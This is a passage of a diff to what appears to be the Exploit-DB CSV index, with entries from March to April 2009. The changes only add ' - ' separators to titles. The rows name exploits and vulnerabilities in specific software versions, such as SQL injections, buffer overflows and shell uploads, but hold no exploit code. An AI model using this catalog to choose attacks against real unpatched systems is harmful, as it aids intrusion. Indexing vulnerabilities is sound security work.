Vulnerabilities",2009-03-10,K-159,php,webapps,0 8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header XSS",2009-03-10,"Juan Galiana Lara",php,webapps,0 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 Permanent XSS",2009-03-10,XaDoS,php,webapps,0 -8198,platforms/php/webapps/8198.pl,"RoomPHPlanning <= 1.6 (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 +8198,platforms/php/webapps/8198.pl,"RoomPHPlanning <= 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 8201,platforms/windows/local/8201.pl,"Foxit Reader <= 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 @@ -7721,22 +7721,22 @@ id,file,description,date,author,platform,type,port 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (XSS/SQL) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow PoC",2009-03-12,n3tpr0b3,linux,dos,0 8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 -8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 (index.php page) Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 -8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 -8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 (Auth Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 -8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 (message) Remote SQL Injection",2009-03-16,s4squatch,php,webapps,0 -8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 (SMNT) Denial of Service Exploit (post auth)",2009-03-16,"Jonathan Salwan",windows,dos,0 +8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - (index.php page) Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 +8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 +8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Auth Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 +8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) Remote SQL Injection",2009-03-16,s4squatch,php,webapps,0 +8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 +8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Denial of Service Exploit (post auth)",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive <= 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - RFI/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 -8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0 +8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow PoC",2009-03-16,Stack,windows,dos,0 -8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 -8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 +8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (Subtitle File) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 +8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) Remote SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - (id) SQL Injection",2009-03-17,"strange kevin",php,webapps,0 @@ -7750,7 +7750,7 @@ id,file,description,date,author,platform,type,port 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Remote Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 -8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection",2009-03-18,girex,php,webapps,0 +8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 - (qorder) Remote SQL Injection",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - (.cue) Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/SQL) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 @@ -7758,17 +7758,17 @@ id,file,description,date,author,platform,type,port 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post Auth)",2009-03-19,"Emory University",cgi,webapps,0 -8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 +8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 - (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - (.bsl) Universal SEH Overwrite Exploit",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS - (XSS/SQL) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow Exploit",2009-03-20,"fl0 fl0w",windows,remote,0 -8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit",2009-03-23,Invisibility,php,webapps,0 -8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 +8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection Exploit",2009-03-23,Invisibility,php,webapps,0 +8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Remote Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,windows,remote,0 -8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 +8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router Remote Denial of Service Vulnerabilities",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Local Kernel Root Exploit",2009-03-23,mu-b,freebsd,local,0 @@ -7781,36 +7781,36 @@ id,file,description,date,author,platform,type,port 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 -8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 +8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post Auth) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - (.eml) Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - (.htm)l Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 -8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 +8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Remote Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 -8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 +8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post Auth) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (0Day)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 -8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 +8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Remote File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution Exploit",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion Vulnerabilities",2009-03-26,ahmadbady,php,webapps,0 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL/RFI) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 -8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 +8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script (Auth Bypass) - SQL Injection",2009-03-27,Qabandi,php,webapps,0 -8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server <= 5.7.0 (NLST) DoS Exploit",2009-03-27,"Jonathan Salwan",windows,dos,0 -8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)",2009-03-27,r0ut3r,windows,remote,22 +8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server <= 5.7.0 - (NLST) DoS Exploit",2009-03-27,"Jonathan Salwan",windows,dos,0 +8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow Exploit (SEH)",2009-03-27,r0ut3r,windows,remote,22 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script (username) Static XSS",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (LFI) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 -8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 (CMP File) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 -8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 (hhp File) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 -8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit",2009-03-29,LiquidWorm,windows,local,0 +8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - (CMP File) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 +8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (hhp File) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 +8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow Exploit",2009-03-29,LiquidWorm,windows,local,0 8302,platforms/php/webapps/8302.php,"glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit",2009-03-29,Nine:Situations:Group,php,webapps,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Local Privilege Escalation Exploit",2009-03-29,"Jon Oberheide",linux,local,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Auth Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 @@ -7818,18 +7818,18 @@ id,file,description,date,author,platform,type,port 8306,platforms/windows/dos/8306.txt,"Firefox 3.0.x - (XML Parser) Memory Corruption / DoS PoC",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - (SQL/DB/Auth Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0 8308,platforms/multiple/dos/8308.c,"Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC",2009-03-30,"THCX Labs",multiple,dos,0 -8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 -8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x (HEAD) Remote Denial of Service Exploit",2009-03-30,"Jonathan Salwan",windows,dos,0 -8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 +8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 +8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service Exploit",2009-03-30,"Jonathan Salwan",windows,dos,0 +8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - (FileName) Local Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC",2009-03-30,"Alfons Luja",windows,dos,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Auth Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution Exploit",2009-03-30,Osirys,php,webapps,0 -8318,platforms/php/webapps/8318.txt,"JobHut <= 1.2 (pk) Remote SQL Injection",2009-03-30,K-159,php,webapps,0 +8318,platforms/php/webapps/8318.txt,"JobHut <= 1.2 - (pk) Remote SQL Injection",2009-03-30,K-159,php,webapps,0 8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 -8320,platforms/multiple/dos/8320.py,"Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 +8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injection Vulnerabilities",2009-03-31,"Salvatore Fresta",php,webapps,0 @@ -7837,20 +7837,20 @@ id,file,description,date,author,platform,type,port 8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart <= 1.1.2 - Remote SQL Injection Exploit (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart <= 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 -8328,platforms/php/webapps/8328.txt,"webEdition <= 6.0.0.4 (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 +8328,platforms/php/webapps/8328.txt,"webEdition <= 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 -8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 (course_id) Remote SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 +8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) Remote SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 (gamestat.php gameID) - SQL Injection",2009-03-31,Dimi4,php,webapps,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion Vulnerabilities",2009-04-01,ahmadbady,php,webapps,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0 -8337,platforms/multiple/dos/8337.c,"XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 +8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)",2009-04-01,n00b,windows,remote,80 -8339,platforms/windows/remote/8339.py,"XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 -8340,platforms/windows/remote/8340.py,"XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 -8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 +8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 +8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 +8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities",2009-04-01,brain[pillow],php,webapps,0 8343,platforms/windows/local/8343.pl,"UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 @@ -7860,19 +7860,19 @@ id,file,description,date,author,platform,type,port 8348,platforms/php/webapps/8348.txt,"form2list (page.php id) Remote SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections <= 1.8.2 - Remote Shell Upload Exploit",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b SQL Injection / Post Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 -8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 +8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)",2009-04-06,n00b,windows,remote,80 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar (ItemId) Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 -8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 +8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 8358,platforms/windows/dos/8358.pl,"UltraISO <= 9.3.3.2685 - (.ui) Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 -8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC",2009-04-06,LiquidWorm,windows,dos,0 +8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow PoC",2009-04-06,LiquidWorm,windows,dos,0 8361,platforms/php/webapps/8361.txt,"Family Connections CMS <= 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS <= 0.5.2 - Remote Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 -8363,platforms/windows/remote/8363.py,"XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)",2009-04-07,His0k4,windows,remote,80 +8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow Exploit (SEH)",2009-04-07,His0k4,windows,remote,80 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 8365,platforms/php/webapps/8365.txt,"Joomla Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8366,platforms/php/webapps/8366.txt,"Joomla Component MailTo (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 @@ -7883,45 +7883,45 @@ id,file,description,date,author,platform,type,port 8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 - (.m3u/.ofl) Universal BoF Exploit",2009-04-08,AlpHaNiX,windows,local,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS (wrap_script) Remote SQL Injection",2009-04-08,PLATEN,php,webapps,0 -8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 +8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog <= 1.5.2 SEC_authenticate() SQL Injection Exploit",2009-04-09,Nine:Situations:Group,php,webapps,0 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - (.swf) Off By One Buffer Overflow PoC",2009-04-09,Stack,windows,dos,0 -8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 -8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 